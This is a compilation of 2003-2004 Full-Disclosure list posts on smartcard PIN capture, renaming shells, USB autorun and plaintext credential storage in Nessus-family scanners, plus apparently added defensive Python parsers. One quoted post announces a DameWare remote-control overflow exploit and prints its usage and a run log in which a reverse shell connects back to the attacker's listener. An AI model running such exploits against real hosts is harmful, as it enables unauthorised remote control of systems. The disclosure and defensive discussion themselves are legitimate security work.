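    """CONNECT targets: the method and path travel inside TLS, so a policy
    that does not terminate SSL at the perimeter can only act on the host."""
    targets = set()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"].upper() == "CONNECT":
            targets.add(rec["url"])
    return sorted(targets)


if __name__ == "__main__":
    for client, pairs in find_rpc_clients(SAMPLE_PROXY_LOG).items():
        print(client, "->", pairs)
    print("opaque tunnels:", opaque_tunnels(SAMPLE_PROXY_LOG))
```

The plain-HTTP case is what Kevin saw in the proxy logs; the CONNECT case is why the earlier thread's respondents argue that inspecting RPC over HTTPS requires terminating the SSL session on a device you control.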


Re: [Full-Disclosure] Clear text password exposure in Datakey's tokens and smartcards

2004-08-05 Thread Kevin Sheldrake
Surely if the user is entering a passphrase then the same problem exists -  
that of effectively eavesdropping that communication from the keyboard?

Ignoring the initial expense for a moment, wouldn't it have made a lot of  
sense to include the keypad actually on the cards?  Obviously, card  
readers would need to be contructed such that the keypad part of the card  
would be exposed during use.  The keypad security could then rely on the  
tamper resistant properties of the rest of the card.

From a costs perspective, I would guess that the actual per-card cost  
increase would be minimal if hundreds of millions of these cards were  
produced.

Kev

Lionel Ferette wrote:
Note that this is true for almost all card readers on the market, not  
only for Datakey's. Having worked for companies using crypto smart  
cards, I have conducted a few risk analyses about that. The conclusion  
has always been that if the PIN must be entered from a PC, and the  
attacker has means to install software on the system (through directed  
viruses, social engineering, etc), the game's over.
The only solution against that problem is to have the PIN entered  
using a keypad on the reader. Only then does the cost of an attack  
raise significantly. But that is opening another can of worms, because  
there is (was?) no standard for card readers with attached pin pad (at  
the time, PC/SCv2 wasn't finalised - is it?).

at least some cards are supporting des passphrases to implement secured  
communication channels but I suppose this feature is not that widely in  
use  how many card owners are prepared to remember both PIN codes  
and passphrases...

toomas


--
Kevin Sheldrake MEng MIEE CEng CISSP
Electric Cat (Bournemouth) Ltd


[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1767 - 14 msgs

2004-07-14 Thread Holcomb, Kevin
This makes no sense..  You're saying I emailed a virus?  The bank firewall will not 
allow me to email a virus, I don't think.  

Thanks,
 
Kevin Holcomb 
W2K System Administrator/Database Administrator
Bank of America
Decision Support Applications (DSA): Campaign Execution and Reporting (CER)
kevin.holcomb@ bankofamerica.com
(w) 704-388-7361  (c) 704-309-6178
(pager) 877-385-0652 
---
Confidentiality Statement: This message is for the designated recipient only and may 
contain privileged, proprietary, or otherwise private information. If you are not the 
intended recipient, you may not copy, disclose, or distribute this message to anyone. 
If you have received it in error, please notify the sender immediately and delete the 
original. Any other use of the e-mail by you is prohibited.
---
 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of
[EMAIL PROTECTED]
Sent: Wednesday, July 14, 2004 10:57 AM
To: [EMAIL PROTECTED]
Subject: Full-Disclosure digest, Vol 1 #1767 - 14 msgs


The original message content contained a virus or was blocked due to blocking rules 
and has been removed.



Re: [Full-Disclosure] Mozilla Security Advisory 2004-07-08

2004-07-09 Thread Wall, Kevin
Dan Veditz wrote in the Mozilla Security Advisory, dated July 7, 2004...

 Solution:
 We urge people to install the patch available on mozilla.org or
 install the latest version of the software.
 
 http://www.mozilla.org/security/shell.html
 
 -Dan Veditz
 Mozilla Security Group 

Well done, Mozilla Security team. Meanwhile, it will probably be
another 6 months until MS gets around to admitting this is a legitimate
problem in IE and getting a fix available (unless it happens to be
fixed in WinXP SP2, coming RSN to a PC near you ;-).

Responsiveness like this is one of the main reasons that I use Mozilla
whenever possible.
-kevin wall
Qwest IT - Application Security Team



Re: [Full-Disclosure] No shell = secure?

2004-07-09 Thread Wall, Kevin
Matthias Benkmann wrote...

 I can't say I've looked at much exploit-code so far but the POC exploits
 to gain root I've seen for Linux all executed /bin/sh. I'd like to know if
 this is true for in-the-wild exploits to root a box, too. If so, would it
 be a useful security measure to rename /bin/sh and other shells (after
 making sure that everything that needs them has been updated to the new
 name, of course)?

No; sometimes they use other shells, such as /bin/bash, /bin/ash,
/bin/zsh, etc. or else execute a single command at a time.

Also, presumably, you'd still have to set SHELL env variable, so
they could presumably just execute $SHELL in many cases.

Worst of all, you now have yourself a maintenance nightmare. Think
of how many shell scripts where you'd have to change the

#!/bin/sh

to whatever full path name you've switched the shell to. And you'd have
to do this whenever you install a vendor update, an RPM, etc.

Yuck! No thanks!

 I'm aware that a dedicated attacker who targets my box specifically will
 not be stopped by this but I don't think I have such enemies. I also know
 that DOS is still possible, but that's also not my concern. I'm simply
 worried about script kiddies using standard exploits against random
 servers on the Internet rooting my box faster than I can patch it.

Well, it probably would stop the script kiddies--for awhile at least.
But see above.

Also, if you keep on top of patches, have appropriate firewall rules
and other access control mechanisms in place, script kiddies are
not all that hard to keep out.

 If renaming the shell is not enough, how about renaming all of the
 standard Unix top-level directories (such as /bin, /etc,...)? Would that
 defeat standard exploits to root a box?

Man, that would REALLY become a maintenance nightmare. You'd have to
customize almost all RPMs, vendor patches, etc. before installing
them.
---
-kevin wall
Qwest IT - Application Security Team
The reason you have people breaking into your software all 
over the place is because your software sucks...
 -- Former whitehouse cybersecurity advisor, Richard Clarke,
at eWeek Security Summit



Re: [Full-Disclosure] No shell = secure?

2004-07-09 Thread Kevin Ponds
As has been discussed, really all you're doing is preventing against
canned exploits.

You're also going to be jumping through a lot of hoops to do this.


There are different ways to achieve the same result, look into canary
stack protection (such as propolice), and a write or execute stack,
such as W^X on OpenBSD or PaX on Linux.  Applying one of these will
at least force an attacker to write a custom exploit for your
configuration, and will give you a lot fewer headaches than running
without shells or renaming the file structure.

However as has been said many times before, security through obscurity
isn't really security at all.  It can buy you time and deter a lot of
folks, but it won't make you secure.

Ponds

On Fri, 9 Jul 2004 21:14:07 +0545, npguy [EMAIL PROTECTED] wrote:
 On Friday 09 July 2004 08:19 am, hax wrote:
  2)  That'd stop a lot of skript kiddies, I guess, but it'd be pretty
  trivial to just rework the shellcode to call some other command
  instead of /bin/sh.
 
 If this is a single target, the attacker can guess your setting and keep
 executing any commands; it could possibly target executing more attacks.
 What about wget from shellcode?
 
 
 




[Full-Disclosure] Re: USB risks (continued)

2004-06-19 Thread Kevin Davis
Many USB keys have hardware switches to make them read only.  With Windows
2000 or Windows XP, no special drivers are required to read USB keys.

Autorun works on removable USB CD drives.

- Original Message - 
From: RSnake [EMAIL PROTECTED]
To: Gadi Evron [EMAIL PROTECTED]
Cc: Harlan Carvey [EMAIL PROTECTED];
[EMAIL PROTECTED]; [EMAIL PROTECTED]
Sent: Friday, June 18, 2004 7:54 PM
Subject: Re: USB risks (continued)



 Autorun doesn't work with USB keyfobs.  Actually, it is my
 understanding that it doesn't work on any media that is deemed writable
 and removable.  The distinction between USB devices and CDs is that the media
 is writable, but the drives aren't removable on CDs.  That of course isn't
 true if you have a USB drive, but I think part of the deal there is that you
 need to install special drivers to even read USB CD drives.  That's kinda a weird
 distinction, but I researched it quite a bit earlier this year and that's
 just how they define it.  With the advent of bootable USB devices, and more USB
 support, you can pretty much bet things will change, but for right now,
 autorun isn't an issue.




Re: [Full-Disclosure] Imaging Operating Systems

2004-05-27 Thread Kevin Connolly
Maarten wrote:
This is an interesting thread...  But out of curiosity, is it also possible to 
do backup / restores using readily available linux tools? 
I'd like to be able to do something like running dd over a network connection, 
or tar, or whatever other tool.  In that case, a bootable CD is all you need.
But I'm unsure how to do that...

Maarten

One suggestion:
make the PC dual boot: Windows and Linux
with the Linux partition larger.
boot Linux and dd the raw Windows partition to a Linux file
boot Windows and play with malware
boot Linux and dd the file back out to the Windows partition
rinse and repeat...
I used this method some years back with Win95 and FreeBSD
but I had a very small Win95 partition.
See also: www.feyrer.de/g4u/ (Ghost for Unix)


Re: [Full-Disclosure] Nessus stores credentials in plain text

2004-03-28 Thread ~Kevin Davis³
Q.  Does Nessus use username and password data and store it in plaintext
locally even after the client connections are long gone?

A. Yes.


If it is not ok for vulnerability scanners like ISS and others to do this, why
is it ok for Nessus to do this?

- Original Message - 
From: Raymond Morsman [EMAIL PROTECTED]
To: ~Kevin Davis³ [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, March 28, 2004 4:27 PM
Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text


 On Sat, 2004-03-27 at 17:47, ~Kevin Davis³ wrote:
  Many people would disagree that storing passwords in plaintext is not a
  vulnerability.  This includes entities like ISS who were doing the same
  thing and once realized it changed it.  I don't see how a plaintext
username
  and
  password is simply system data and not also credentials.  And guess
what?
  Nessus itself has several plugins that check for plaintext passwords in
  other applications.

 Q: Does Nessus use this data for its own persona-check?
 A: No, it uses it for client connections.




Re: [Full-Disclosure] Nessus stores credentials in plain text

2004-03-27 Thread ~Kevin Davis³
Many people would disagree that storing passwords in plaintext is not a
vulnerability.  This includes entities like ISS who were doing the same
thing and once realized it changed it.  For many, it is not a matter of
merely being nice to encrypt plaintext passwords, but a requirement.  You
are giving the keys to the kingdom away for free here.

- Original Message - 
From: Raymond Morsman [EMAIL PROTECTED]
To: ~Kevin Davis³ [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Saturday, March 27, 2004 4:08 AM
Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text


 On Sat, 2004-03-27 at 06:01, ~Kevin Davis³ wrote:
  I have posted this issue to a couple entities like bugtraq and CERT
  with no response.  I mentioned this issue to an organization

 And so it should be. These are not vulnerabilities in the pure sense of
 the word.

 What you call credentials are nothing more than system data for Nessus
 and therefore not an issue for Nessus.

 You can't use MD5 on systemdata.

 However, I must agree that it would be nice if this information would be
 encrypted with the users password.

 Raymond.




Re: [Full-Disclosure] Nessus stores credentials in plain text

2004-03-27 Thread ~Kevin Davis³
Many people would disagree that storing passwords in plaintext is not a
vulnerability.  This includes entities like ISS who were doing the same
thing and once realized it changed it.  I don't see how a plaintext username
and password is simply system data and not also credentials.  And guess what?
Nessus itself has several plugins that check for plaintext passwords in
other applications.  I guess it has a different standard for itself as
opposed to other applications.  For many, it is not a matter of merely being
nice to encrypt plaintext passwords, but a requirement.  You are giving the
keys to the kingdom away almost for free here.


 - Original Message - 
 From: Raymond Morsman [EMAIL PROTECTED]
 To: ~Kevin Davis³ [EMAIL PROTECTED]
 Cc: [EMAIL PROTECTED]
 Sent: Saturday, March 27, 2004 4:08 AM
 Subject: Re: [Full-Disclosure] Nessus stores credentials in plain text


  On Sat, 2004-03-27 at 06:01, ~Kevin Davis³ wrote:
   I have posted this issue to a couple entities like bugtraq and CERT
   with no response.  I mentioned this issue to an organization
 
  And so it should be. These are not vulnerabilities in the pure sense of
  the word.
 
  What you call credentials are nothing more than system data for Nessus
  and therefore not an issue for Nessus.
 
  You can't use MD5 on systemdata.
 
  However, I must agree that it would be nice if this information would be
  encrypted with the users password.
 
  Raymond.
 




[Full-Disclosure] Nessus stores credentials in plain text

2004-03-26 Thread ~Kevin Davis



I have posted this issue to a couple entities like bugtraq and 
CERT with no response. I mentioned this issue to an organization today 
which was considering using Nessus as a vulnerability scanner to assess their 
network security issues and this was in violation with their security policy so 
they are reconsidering using it. Please read below...


Software Vendor: Nessus (www.nessus.org)
Software Package: Nessus
Versions Affected: 2.0.10a (possibly others)
Synopsis: Username and password for various accounts stored in unencrypted plain text

Issue Date: Feb 22, 2004

Vendor Response: Vendor notified December 4, 2003. Vendor declined to resolve issue.



1. Summary

The open source Nessus Vulnerability scanner stores the credentials of
various types of accounts in unencrypted plain text in a configuration file.

2. Problem Description

The .nessusrc file stores username and password information for various
types of accounts in unencrypted plain text. Those parameters are typically
set from the native nessus client but can also be added manually. When
setting these parameters from the Nessus client, the user is also not
informed of this sensitive information being stored insecurely. This
potentially affects the following types of accounts:

FTP, IMAP, POP2, POP3, NNTP, SNMP, SMB (Windows NT Domain)

3. Solution

None at this time. A lengthy discussion with the vendor resulted in the
vendor's decision that this was not a security risk that warrants resolution.




[Full-Disclosure] NEWT Scanner stores credentials in plain text

2004-03-26 Thread ~Kevin Davis




I have posted this issue to a couple entities like NTbugtraq 
and CERT with no response. Please read 
below...


Software Vendor: Tenable Security (www.tenablesecurity.com)
Software Package: Newt
Versions Affected: 1.4 and earlier (and possibly 1.5)
Synopsis: Username and password for various accounts stored in unencrypted plain text

Issue Date: Feb 22, 2004

Vendor Response: Vendor notified December 4, 2003. Vendor declined to resolve issue.



1. Summary

NEWT is a commercial Windows port of the open source Nessus Vulnerability
scanner by Tenable Security. Newt stores the credentials of various types
of accounts in unencrypted plain text in a configuration file.

2. Problem Description

The config.xml file stores username and password information for various
types of accounts in unencrypted plain text. Those parameters are typically
set from the NEWT Scanner interface. When setting these parameters, the user
is also not informed of this sensitive information being stored insecurely.
This potentially affects the following types of accounts:

FTP, IMAP, POP2, POP3, NNTP, SNMP, SMB (Windows NT Domain)

Typically this config file is stored locally at the following location:

\Documents and Settings\Username\Tenable\NeWT\config\config.xml

3. Solution

None at this time. A lengthy discussion with the vendor resulted in the
vendor's decision that this was not a security risk that warrants resolution.




[Full-Disclosure] NessusWX stores credentials in plain text

2004-03-26 Thread ~Kevin Davis




Software Vendor: NessusWX (nessuswx.nessus.org)
Software Package: NessusWX
Versions Affected: 1.4.4 and possibly earlier versions
Synopsis: Username and password for various accounts stored in unencrypted plain text

Issue Date: Feb 22, 2004

Vendor Response: Vendor notified December 4, 2003. Vendor claiming to be working on issue.



1. Summary

NessusWX is a GPL Windows client for the open source Nessus Vulnerability
scanner. NessusWX stores the credentials of various types of accounts in
unencrypted plain text in a configuration file.


2. Problem Description

The user saves specific scan configuration settings in sessions created
within NessusWX. For every session a directory is created named the same as
the session name with a .session appended to it. For instance, in the case of
a session named MySession, the default location for the session
configuration files would be in the directory C:\NessusDB\MySession.session.
Every session can save unique Nessus plugin configuration settings. Among
these are username/password settings for various types of accounts. These
options are accessed by selecting a session, and then in the main menu under
"Session" selecting the "Properties" submenu. This will display a
multi-tabbed dialog. Select the "Plugins" tab and then click on the
"Configure Plugins" button. A listbox will be displayed and near the bottom
of the list there will be an item named "Login Configurations". When the user
saves this logon information, both the usernames and passwords are saved in
plaintext in the above specified path in a file named preferences. Further,
after this information is saved to the file, if the user goes back and
removes this information using the GUI, the user interface indicates that
the information has been removed but this is misleading because it is still
retained in the configuration file. This behavior is somewhat inconsistent.
Sometimes the entire username/password data is retained in the file and
sometimes the first character of each is removed. When setting these
parameters, the user is also not informed of this sensitive information
being stored insecurely. This potentially affects the following types of
accounts:

FTP, IMAP, POP2, POP3, NNTP, SNMP, SMB (Windows NT Domain)

3. Solution

None at this time. The vendor agreed to fix the problem 
by allowing the user to password protect the data and also have the data 
removed properly. It has been over 60 days and the patch has not been 
made available. 



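Added example covering the three advisories above (Nessus .nessusrc, NEWT config.xml, NessusWX preferences); it is not code from the advisories or from any of the vendors. It scans a "key = value" preference file and an XML configuration file for settings whose name looks credential-bearing and whose value is non-empty, which also catches the NessusWX residue where only the first character of a "removed" password was dropped. The sample file contents and the preference names are constructed for the example and are not claimed to match the real file layouts.

```python
"""Find plaintext credentials left behind in scanner configuration files.

Added example, not part of the advisories above. The sample contents and
the preference names are constructed; the real .nessusrc, NessusWX
preferences and NEWT config.xml layouts may differ.
"""
import re
import xml.etree.ElementTree as ET

# Setting names that carry a secret rather than an identity.
CREDENTIAL_KEY_RE = re.compile(r"password|passwd|passphrase|community|secret", re.IGNORECASE)
# "key = value" lines; keys may contain spaces, brackets and colons.
KEY_VALUE_RE = re.compile(r"^\s*(?P<key>[^=]+?)\s*=\s*(?P<value>.*)$")

# Constructed .nessusrc-style preferences. The POP3 line models the NessusWX
# case where "removing" a password only stripped its first character.
SAMPLE_NESSUSRC = """\
begin(PLUGINS_PREFS)
 Login configurations[entry]:SMB account : = scanner
 Login configurations[password]:SMB password : = Winter2004
 Login configurations[entry]:SMB domain (optional) : = CORP
 Login configurations[password]:FTP password : =
 Login configurations[password]:POP3 password : = ecret
 SNMP settings[entry]:Community name : = public
end(PLUGINS_PREFS)
"""

# Constructed config.xml-style file.
SAMPLE_CONFIG_XML = """\
<config>
  <credentials>
    <smb><username>scanner</username><password>Winter2004</password></smb>
    <snmp community="public"/>
    <ftp><password></password></ftp>
  </credentials>
</config>
"""


def find_plaintext_credentials(text):
    """Credential-bearing keys with a non-empty value in a key = value file.

    Only the key and the secret's length are returned, so the report itself
    does not become another copy of the plaintext.
    """
    hits = []
    for line in text.splitlines():
        m = KEY_VALUE_RE.match(line)
        if not m:
            continue
        key, value = m.group("key").strip(), m.group("value").strip()
        if CREDENTIAL_KEY_RE.search(key) and value:
            hits.append({"key": key, "length": len(value)})
    return hits


def find_xml_credentials(text):
    """Same check over element text and attributes of an XML config file."""
    hits = []

    def walk(elem, path):
        here = f"{path}/{elem.tag}" if path else elem.tag
        if CREDENTIAL_KEY_RE.search(elem.tag) and (elem.text or "").strip():
            hits.append({"where": here, "length": len(elem.text.strip())})
        for name, value in elem.attrib.items():
            if CREDENTIAL_KEY_RE.search(name) and value.strip():
                hits.append({"where": f"{here}@{name}", "length": len(value.strip())})
        for child in elem:
            walk(child, here)

    walk(ET.fromstring(text), "")
    return hits


if __name__ == "__main__":
    for hit in find_plaintext_credentials(SAMPLE_NESSUSRC):
        print(f"{hit['key']!r}: {hit['length']}-char secret in plaintext")
    for hit in find_xml_credentials(SAMPLE_CONFIG_XML):
        print(f"{hit['where']}: {hit['length']}-char secret in plaintext")
```

Run over a user's home directory this gives an inventory of which scanner credentials would be exposed by a copied profile or backup, which is the question the policy violation in the first advisory turns on. The blank FTP entry is deliberately not reported; the one-character-short POP3 entry is.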

Re: [Full-Disclosure] steganography software recommendations

2004-03-24 Thread Kevin Warren Ponds
We use S-Tools in my security class, it seems to work out well, unzipped
is like 500k, drag and drop gui.

 steganographic encryption program.

Steg is not crypto, although they are very often used in tandem.  However,
S-Tools can also do symmetric crypto with a few good ciphers.


-ponds



[Full-Disclosure] RE: What's wrong with this picture?

2004-02-26 Thread Wall, Kevin
 Somebody want to explain to this guy that there's a difference between
 publicly available exploits and 0-day exploits circulating 
 in the underground?
 
 http://news.bbc.co.uk/1/hi/technology/3485972.stm
 
 Scary part is that he's a high honcho at Microsoft's security unit.

So, I see... according to Mr. Aucsmith's logic, if we NEVER issue
security patches, we'll have LESS security vulnerabilities. Yeah, right.
Boy, guess we're all out of a job then. (Actually, it's attitudes like
this that will keep us employed for a very long time. ;-)
-kevin
---
Kevin W. Wall   Qwest Information Technology, Inc.
int i;  /* WARNING: This code may be intellectual property of
SCO.
 *  Use at your own risk!
 */

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Absurd Microsoft QA? The Return of the username@password...

2004-02-12 Thread Kevin Sullivan
* Here's the final straw…  On February 10, 2004…  Microsoft released
 a patch that…  restores the [EMAIL PROTECTED]: functionality in URL
references!
 * It seems they are trying to hide this fact as this is not
widely publicized and it is NOT being labeled as an IE patch nor a even
a security patch!
Probably because it is NOT a security patch, nor does it restore the
embedded-credentials functionality. It addresses the specific problem
(created by the 04 patch) of not being able to pass user credentials in
an XML Open() call.
From the M$ article:
This fix will only enable the scenario where user credentials are passed as
parameters in the Open() method call. It will not enable scenarios where
the user credentials are embedded in the URL.
Ks 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] DreamFTP Server 1.02 Buffer Overflow

2004-02-07 Thread Kevin Gerry
Tsk- Quit being a security expert and just listen to the vulns as they come 
in like a good puppy ^^

Anyhow... Yeah... What's with that? . Call an orange an orange. Not a dog. 
(Not you Bill- The original poster)

~

So, that would be a format string vuln, not a buffer overflow, right?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Interesting side effect of the new IE patch

2004-02-04 Thread Kevin Gerry
Actually- there is a registry key you can put in to change back to the 
'correct' user:[EMAIL PROTECTED] way of processing... So it DOES still have that in 
there to follow RFC- Just needs to be activated first.

(It's in a newer KB article.)

~

- Original Message - 
From: Andreas 'GlaDiaC' Schneider [EMAIL PROTECTED]
To: Schmehl, Paul L [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Wednesday, February 04, 2004 6:00 PM
Subject: Re: [Full-Disclosure] Interesting side effect of the new IE patch


The Netscape project is dead... you should check the Mozilla Suite or
Mozilla Firebird :)
http://www.mozilla.org/

Schmehl, Paul L wrote:
| Since the IE browser no longer allows the @ sign in a uri, you can no
| longer download files from some vendors' sites.  Still works in Netscape
| 7.1, however.  So far I've found three sites, but I haven't done an
| extensive investigation.  These are just ones that I've stumbled across.
| The most interesting one is NAI's download site for enterprise licensed
| software packages.  (I suppose, if one was ambitious, one could google
| for @?)
|
| I wonder how many other vendors are cheating on the RFCs to facilitate
| browser interaction?
|
| Paul Schmehl ([EMAIL PROTECTED])
| Adjunct Information Security Officer
| The University of Texas at Dallas
| AVIEN Founding Member
| http://www.utdallas.edu/~pauls/
|
| ___
| Full-Disclosure - We believe in it.
| Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
- --
http://www.linux-gamers.net - your online gaming resource
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] antivirus s/w

2004-01-27 Thread Kevin Cherry
One product you might want to look into is Cisco Security Agent or CSA.
CSA runs on all NT Class machines and works as a kind of a Personal
Firewall.  It does this through OS behavior monitoring and then reports
any suspicious activity to a centralized console called VMS.  The VMS
console can read the log information leading up to a successful block
and compare that information from other CSA agents running on other
machines to determine if a new rule needs to be generated and pushed out
to the clients to block a new worm or attack that may be active on your
network.  CSA's rules can be customized down to a very detailed level
and provides a proactive approach for combating new viruses and system
compromise attempts and it does not need any definitions to do so,
because it works by monitoring OS behavior.  CSA will also work in
combination with Cisco VPN concentrators by only allowing machines that
have CSA running to connect to the VPN.  Here are some links for more
info.

http://www.cisco.com/en/US/products/sw/secursw/ps5057/index.html

http://www.cisco.com/en/US/products/sw/cscowork/ps2330/

If I made any mistakes in my description please let me know, as I was only
told this information at a Cisco Security Seminar and I may have forgotten
some things or explained them incorrectly.


Kevin




-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron
Sent: Tuesday, January 27, 2004 5:10 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] antivirus s/w

Patrick J Okui wrote:

  Hi all,
 
  (.*flames.*/dev/null)
 
  1. I'm trying to decide on an AV solution for a campus wide n/w.
  I'm basically looking for something that'll respond as quick as
  possible to new viruses. I'm currently evaluating NAV, and Fprot.
  Any other suggestions/recomendations?

To install on every workstation or to filter malware from email?

 
  2. Fprot have an AV 4 linux/bsd workstations... does this just
  scan for virii from infected winbloze or are there un*x virii i'm
  ignorant about?

A better question would be.. rootkits?

Gadi Evron




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] antivirus s/w

2004-01-27 Thread Kevin Patterson
Try Trend Micro.

-Original Message-
From: Randal L. Schwartz [mailto:[EMAIL PROTECTED]
Sent: Tuesday, January 27, 2004 9:52 AM
To: Patrick J Okui
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] antivirus s/w


 Patrick == Patrick J Okui [EMAIL PROTECTED] writes:

Patrick Hi all,
Patrick (.*flames.*/dev/null)

Patrick 1. I'm trying to decide on an AV solution for a campus wide n/w.
Patrick I'm basically looking for something that'll respond as quick as
Patrick possible to new viruses. I'm currently evaluating NAV, and Fprot.
Patrick Any other suggestions/recomendations?

PLEASE MAKE SURE that it doesn't send email responses.

I'm getting 500 mydoom an hour.  I can filter those.
I'm getting 1500 AV-responses an hour.  I can't filter those.

AV response email is PART OF THE PROBLEM now, not PART OF THE SOLUTION.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
[EMAIL PROTECTED] URL:http://www.stonehenge.com/merlyn/
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

2003-12-19 Thread Kevin Mitnick
Hi all!


I'm sorry for my absence from the list for the past few months, but I have
been very busy traveling outside the US, and my mail account was
experiencing problems.  Now that I am receiving the messages again, I have
been playing catch up, by reading the old posts.

I do have some good news, and was hoping that some of you might be able to
assist me.  I have been commissioned by Wiley & Sons to write a second book,
which is tentatively titled, The Art of Intrusion.  This book will
chronicle detailed accounts of real, untold hacks by the perpetrators who
did it, and I will provide a security analysis and describe how the attack
could be mitigated/prevented in today's environment.  I am going to tell the
story from the perpetrator's stance, not just from research obtained from
law enforcement officials and records.

I am looking for former/retired hackers that would be willing to tell me the
details of their sexiest hack.  I am not interested in the run-of-the-mill
attacks such as, exploiting RPC DCOM, but rather creative ones that
incorporated technical, physical and/or social engineering aspects.

 

I am offering $500 for the most provocative story that makes it into the
book, and if the person wishes, we can protect their anonymity by the use of
a handle.  All contributors selected for the book, will receive a copy of
both books autographed by the authors.

I should have more information up on FreeKevin.com today, as well as
DefensiveThinking.com.  If someone would like to contact me with a story or
a possible lead on a storyteller, please write to me at
[EMAIL PROTECTED], or call at (310)689-7229.  I would appreciate
any assistance you can offer. 

All my best,

 

Kevin Mitnick

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Adik
Sent: Friday, December 19, 2003 8:38 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
Overflow Exploit

DameWare Mini Remote Control Server Exploit

C:\xploits\dmware>dmware

...oO DameWare Remote Control Server Overflow Exploit Oo...

-( by Adik netmaniac[at]hotmail.KG )-

 - Versions vulnerable: <= DWRCS 3.72.0.0
 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1

 Usage: dmware TargetIP TargetPort YourIp YourPort
 eg: dmware 10.0.0.1 6129 10.0.0.2 21


C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53

...oO DameWare Remote Control Server Overflow Exploit Oo...

-( by Adik netmaniac[at]hotmail.KG )-

 - Versions vulnerable: = DWRCS 3.72.0.0
 - Tested on: DWRCS ver: 3.72.0.0 Win2k SP3  WinXP SP1

[*] Target IP:  192.168.63.130  Port: 6129
[*] Local IP:   192.168.63.1Listening Port: 53

[*] Initializing sockets... [ OK ]
[*] Binding to local port: 53...[ OK ]
[*] Setting up a listener...[ OK ]

 OS Info   : WIN2000 [ver 5.0.2195]
 SP String : Service Pack 3

 EIP: 0x77db912b (advapi32.dll)

[*] Constructing packet for WIN 2000 SP: 3...   [ OK ]
[*] Connecting to 192.168.63.130:6129...[ OK ]
[*] Packet injected!
[*] Connection request accepted: 192.168.63.130:1056
[*] Dropping to shell...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>exit
exit
[x] Connection closed.

C:\xploits\dmware>

--
cheerz,

Adik


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server Overflow Exploit

2003-12-19 Thread Kevin Mitnick
The difference is that I'm offering $500 for the best story of a single hack,
and I'm willing to pay $200 for each story that makes the final draft.

Markoff would not agree to pay one dime.

Cheers,

Kevin Mitnick

Check out http://www.zdnet.com.au for the story


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jelmer
Sent: Friday, December 19, 2003 4:03 PM
To: Kevin Mitnick; 'Adik'; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
Server Overflow Exploit

If this is legit

from a /. interview :

--snip--
John Markoff had first libeled me in his book, Cyberpunk, which he
co-authored with his former wife, Katie Hafner. In and around 1990, Markoff
and Hafner contacted me to request my participation for a book about three
hackers, including myself. In considering their request, I asked about their
budget to compensate me for my time and/or life story rights. Both Markoff
and Hafner were unwilling to compensate me as a source, because it was
unethical. I explained that it was unethical for me to give them my story
for free. We were at an impasse
--snip--

from the site :

--snip--
If your story makes it into the book, you'll receive a free copy of my first
book, The Art of Deception, plus a rare Advanced Reader's Copy of the new
one with your story in it -- both signed by me with a personal inscription
to you in your real name or your handle or pseudonym.
--snip--

That's definitely more ethical ;)


- Original Message - 
From: Kevin Mitnick [EMAIL PROTECTED]
To: 'Adik' [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Sent: Saturday, December 20, 2003 12:30 AM
Subject: RE: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control
Server Overflow Exploit


 Hi all!


 I'm sorry for my absence from the list for the past few months, but I have
 been very busy traveling outside the US, and my mail account was
 experiencing problems.  Now that I am receiving the messages again, I have
 been playing catch up, by reading the old posts.

 I do have some good news, and was hoping that some of you might be able to
 assist me.  I have been commissioned by Wiley & Sons to write a second
book,
 which is tentatively titled, The Art of Intrusion.  This book will
 chronicle detailed accounts of real, untold hacks by the perpetrators who
 did it, and I will provide a security analysis and describe how the
attack
 could be mitigated/prevented in today's environment.  I am going to tell
the
 story from the perpetrator's stance, not just from research obtained from
 law enforcement officials and records.

 I am looking for former/retired hackers that would be willing to tell me
the
 details of their sexiest hack.  I am not interested in the run-of-the-mill
 attacks such as, exploiting RPC DCOM, but rather creative ones that
 incorporated technical, physical and/or social engineering aspects.



 I am offering $500 for the most provocative story that makes it into the
 book, and if the person wishes, we can protect their anonymity by the use
of
 a handle.  All contributors selected for the book, will receive a copy of
 both books autographed by the authors.

